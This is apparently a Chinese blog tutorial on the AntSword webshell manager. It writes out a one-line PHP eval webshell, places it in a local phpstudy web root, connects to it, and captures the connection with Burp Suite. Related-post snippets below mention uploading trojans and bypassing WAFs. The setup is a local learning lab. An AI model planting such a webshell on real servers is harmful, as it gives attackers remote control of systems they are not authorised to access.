中国蚁剑的应用

原创 已于 2024-10-29 22:43:36 修改 · 293 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全

于 2024-10-29 22:43:02 首次发布

一. 使用蚁剑连接木马

1.创建一个php文件

<? php eval($_REQUEST["ant"]); ?>,以生成木马

2.将写好的php文件放入网站目录中

 然后启动phpstudy 打开Apache和Mysql

3.打开蚁剑,添加数据

url为http://127.0.0.1/shell.php

连接密码为木马中传递的参数名(attack)

测试连接 连接成功后我们就可以点进去对文件进行增删改查了

二.bp抓包 

找到代理设置

选择手动

确保和bp代理监听器的设置一样

输入url后测试连接 

连接成功后打开bp开始抓包

打开蚁剑

再点击测试连接,这时候bp就可以抓到包了

iii59
关注
[ 常用工具篇 ] AntSword 安装及使用详解
qq_51577576的博客
09-19 2509
[ 渗透工具篇 ] AntSword安装及使用详解 >中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 通俗的讲:中国是 一 款比菜刀还牛的shell控制端软件。 中国推崇模块化的开发思想,遵循开源,就要开得漂亮的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点点滴滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力!
的使用之一句话木马
2301_79685710的博客
10-30 1377
的使用之一句话木马。
操作手册
weixin_44820552的博客
03-27 4309
(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过进行连接获取被测平台的服务器webshell。
中国安装使用教程
Karka_的博客
03-21 6218
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
【webshell工具——安装使用教程
SUSUYUA的博客
02-06 1万+
本篇内容主要为webshell工具的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。
中国的安装以及简单的使用方法
qq_59020256的博客
12-31 2453
这里输入的连接密码时6是因为在写入redis.cmd时,REQUEST[6] 这个里面的值为6。这里就可以查看到http://192.168.251.133/shell.php里面的所有信息。点击初始化,选择第二个文件目录。还有其他使用方法,不做过多赘述。则会显示初始化成功,重启后会。成功后则会出现这么一个结果。第一次打开这个进行初始化。输入url和连接密码即可。鼠标右键点击添加数据。
中国AntSword
04-07
中国,又称AntSword,是一款开源的网络渗透测试工具,主要应用于CTF(Capture The Flag)竞赛和网络安全领域的安全测试与分析。这款工具以其简单易用、功能丰富的特性深受安全研究人员和爱好者喜爱。在本文中,...
中国源码antSword-2.1.9.zip
09-17
中国(AntSword)是一款开源的安全工具,主要用于网络安全测试和Web应用的渗透测试。在本案例中,我们讨论的是其2.1.9版本的源码。这个压缩包"antSword-2.1.9.zip"包含了项目在该版本的所有源代码,用户可以...
中国2.1.9_内含源码和加载器.rar
11-19
中国是一款开源的Web渗透测试工具,以其高效、便捷的操作方式受到许多网络安全专业人士的青睐。版本2.1.9是该工具的一个迭代更新,它提供了更多的功能和优化,以帮助用户更好地进行网站的安全测试。加载器v4.0.3...
中国AntSword-v1.1.2-win32-x64
03-21
中国AntSword-v1.1.2-win32-x64:一款跨平台的网站管理利器》 中国(AntSword)是一款备受业界关注的开源网站管理工具,尤其对于合法的渗透测试安全专家和日常管理网站的管理员而言,它是一款不可或缺的...
中国安全评估常用工具,加强您的信息安全
05-23
中国是一款广泛应用网络安全行业的渗透测试工具,通过快速、简洁实用、集成化的方式提供了全方位的安全检测支持。中国的成功在于它不仅拥有丰富的插件库和可供选择的功能模块,同时也具备强大、可靠的渗透...
的基本使用
yuqnqi的博客
05-08 1755
我的是 “D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\site”进入webshell.top的根目录,新建.txt文档,将后缀名改为.php并写入一句话木马。开启浏览器访问木马,我的页面是出现警告信息,不是报错,因为我设置的是显示警告信息。接下打开webshell.top的根目录,测试连接成功后 点击左上角的 “添加”响应码为200,说明脚本正常运行。接下来使用连接webshell。这里正常会返回403,不要慌。打开,单击右键, 添加数据。
木马使用
zhuge_long的专栏
07-03 1089
数据库对文件的权限确认。
中国的具体使用
最新发布
2301_80010855的博客
11-01 447
以皮卡丘靶场的一道文件上传题目为例,展示的具体使用过程。
连接建立
2301_79621623的博客
10-26 931
中国支持Windows、Linux、macOS等多个操作系统,用户可以在不同的平台上无缝使用,它还支持多种脚本语言,包括PHP、ASP、ASPX、JSP等,能够广泛应用于不同类型的网站管理。通过中国,用户可以轻松实现对网站各项指标的实时监控,包括但不限于服务器状态、流量统计、日志分析等。打开,右键添加数据,连接密码即为一句话木马里自己定义的连接指令,编码器可以随便选,连接不成功就换一个,保存即可创建成功。在此页面打开终端,我们可以通过指令获取连接机器的各种信息了。创建好后,单机选项即可连接
中国(AntSword)安装、使用教程
热门推荐
alert['Hello World']
08-24 12万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
连接一句话木马
m0_64417923的博客
05-18 8959
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
Upload-Labs通关
m0_64180167的博客
07-26 1224
首先 很简单文件上传就是 需要用户进行上传文件 图片或视频等信息但是如果用户恶意上传木马怎么办?这里由提到了木马。
dvwa 中国图片一句话木马连接错误{}的原因找到了
m0_73653963的博客
10-28 1007
直接输入url后,自动产生的cookie是不对的,会报错{},需要抓取cookie复制后添加到的请求信息中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值